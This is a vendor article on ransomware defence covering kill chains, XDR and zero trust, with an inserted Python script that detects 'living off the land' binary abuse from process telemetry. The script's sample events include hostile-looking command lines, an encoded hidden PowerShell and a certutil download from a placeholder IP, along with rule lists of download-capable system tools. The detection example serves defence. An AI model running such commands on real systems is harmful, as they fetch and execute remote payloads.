Ransomware has been the most prevalent form of cyber attack every year for the last decade. And it shows no sign of abating. Cyber criminals are coming up with new ways to monetise their attacks and employing more complex and sophisticated tactics.
Looking ahead to 2024, the Trellix Advanced Research Center predicts that more ransomware groups will contact the clients of their victims as a new way to apply pressure and increase their earnings.
What can you do to strengthen your security posture and protect your organisation? Trellix is partnering with Illumio on a series of Ransomware Detection and Response Workshops this December in the United States. Here are some key pointers from the workshops, with insights from Illumio Chief Evangelist, John Kindervag, widely known as the creator of zero trust.
Understand the anatomy of a ransomware attack and the ransomware kill chain
Ransomware attacks are sophisticated multi-stage operations that take place over time. The Trellix Advanced Research Center analysed more than 9 000 real-world attacks to develop a seven-stage kill chain model specific to ransomware.
During an early stage of the kill chain, such as reconnaissance, an attacker may be scanning your environment, gathering information about it and phishing your users. An XDR platform with a threat intelligence foundation helps organisations detect attacks at these earliest stages.
Ransomware grows more dangerous after initial access, as attackers move laterally through the network and hunt for valuable data to exfiltrate to a command and control server. Shutting down lateral movement and command and control is essential to reducing the impact of an attack. Yet many organisations are challenged to connect the dots across multiple siloed tools and prioritise threats amid alert “noise” during these phases – another reason XDR is essential.
Says Kindervag: “The most important thing that organisations need to understand is that they’re allowing command and control from the ransomware attacker to come into their network and access the data or asset that is being hit with a ransomware attack.”
Prepare by assessing your gaps and locating your crown jewels
Preparation is critical to combating ransomware. According to Trellix CISO Harold Rivas: “Regular security control assessments are crucial tools for identifying weak spots in systems.”
Your preparation should include simulated attacks and vulnerability scans. Ransomware isn’t like other cyber incidents, so it’s important to drill for it. Taking part in tabletop exercises, engaging professional services for vulnerability assessments, and staying abreast of new threat actors and tactics can all help you prepare.
It’s especially important before an attack to understand the critical data assets you’re protecting.
Says Kindervag: “Understand what data or assets you have that are really important and critical to your business function (data that you would be forced to pay a ransom on if it was held hostage because your operations couldn’t continue without it). That is precisely the data that attackers will target. There are two types of data in the world: there’s data that people want to steal and everything else. You protect the data that people want to steal. And if you don’t understand what that is, then you’re a juicy target for attackers.”
Gain visibility with XDR
Visibility is key to effective ransomware defence. The earlier in the ransomware kill chain that you can detect and respond to an attack, the better off you will be. By integrating multiple data sources and providing intelligent correlation across security controls and threat intelligence, XDR helps you detect and respond to an attack much earlier in the ransomware life cycle.
“XDR provides telemetry for visibility that can be vital to early detection and mitigation of ransomware attacks,” says Kindervag.
The Trellix XDR Platform minimises time to detection and resolution from days and weeks to hours and minutes.
Evolve your maturity
Ransomware detection and response maturity is a journey. Many organisations at early stages of their maturity have endpoint protection. Endpoint protection is foundational, but it’s not enough. Ransomware threat actors are increasingly using legitimate, non-malicious tools to escape detection – commonly known as LOLBins (“living off the land” binaries and scripts) – which traditional endpoint protection struggles to detect because the binaries themselves are signed and expected on every host.
As you evolve from foundational ransomware resilience, layer additional security controls and link them through integrations. In the Trellix Ransomware Detection and Response Workshops, we cover increasing stages of ransomware resilience. Mature organisations may integrate EDR, XDR, NDR and other sophisticated technologies.
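The point above is that LOLBin abuse cannot be caught by asking "is this binary malicious?"; it has to be caught from behaviour in the process telemetry that EDR/XDR collects. The following is an added example (not code from Trellix, Illumio or the workshops) that runs three such behavioural rules over a handful of constructed process-creation events; the event fields, rule names and sample command lines are all assumptions made for illustration.

```python
import re

# Constructed sample telemetry (not real data): process-creation events in the
# shape an EDR/XDR sensor reports, with parent image, child image and command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\report.txt"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.txt x.txt"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
]

# Signed Windows binaries that are legitimate on their own, so signature and
# reputation checks pass them; only behaviour (who launched them, with what
# arguments) separates abuse from normal use. Lists are illustrative, not complete.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
DOWNLOAD_CAPABLE = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe"}
USER_APPS = {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE", "chrome.exe", "msedge.exe"}

ENCODED_FLAG = re.compile(r"(?i)\s-(enc|encodedcommand|e)\s")
URL_ARG = re.compile(r"(?i)https?://")

def classify(event):
    """Return the names of the behavioural rules an event trips (empty if benign)."""
    hits = []
    image, parent, cmd = event["image"], event["parent"], event["cmdline"]
    # A document or browser process launching a script host is the classic
    # phishing-to-execution pivot; the child binary itself is always "clean".
    if image in SCRIPT_HOSTS and parent in USER_APPS:
        hits.append("script_host_spawned_by_user_app")
    # Encoded command lines hide intent from simple keyword matching.
    if image in SCRIPT_HOSTS and ENCODED_FLAG.search(cmd):
        hits.append("encoded_script_command")
    # An admin utility reaching out to a URL is a download capability being
    # repurposed; the same tool used offline (event 5) does not fire.
    if image in DOWNLOAD_CAPABLE and URL_ARG.search(cmd):
        hits.append("system_tool_fetching_url")
    return hits

def detect(events):
    """Run every event through the rules and keep only those with at least one hit."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for cmdline, rules in detect(SAMPLE_EVENTS):
        print(f"{', '.join(rules):60} {cmdline}")
```

Rules like these depend on telemetry that records parent process and full command line, which is exactly the visibility gap the text attributes to foundational endpoint protection.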
Explains Kindervag: “Much of cyber security is about creating friction so that the attacker will move off to a softer target. It’s often said that 'attackers don’t attack well-defended networks', and since attackers have a return on investment (ROI) that they must meet, they’re not going to spend much time in a zero trust environment that’s properly segmented. That’s because they recognise it’s fairly futile to get to the assets they want to steal or disrupt in order to monetise their business model. In short, micro-segmentation makes it harder for bad actors to realise a tangible ROI on their attacks.”
Implement a zero trust strategy
Zero trust principles of “never trust, always verify” arose from Kindervag’s time as VP and Principal Analyst at Forrester Research. At Illumio, a zero trust segmentation approach makes it difficult for cyber criminals to carry out their attacks.
Kindervag explains: “In zero trust, our primary control is a segmentation gateway that segments the data or asset into its own protect surface (essentially, the smallest possible reduction of the attack surface to the data, applications, assets and services that you need to protect). So, having visibility is number one. You’re trying to get visibility so that you can see the ransomware attack starting to happen and stop it from being successful. Having proper telemetry becomes really important as well. And then a way to operationalise that quickly, like with zero trust segmentation, so you can shut down the attack before it can do significant damage to the business.”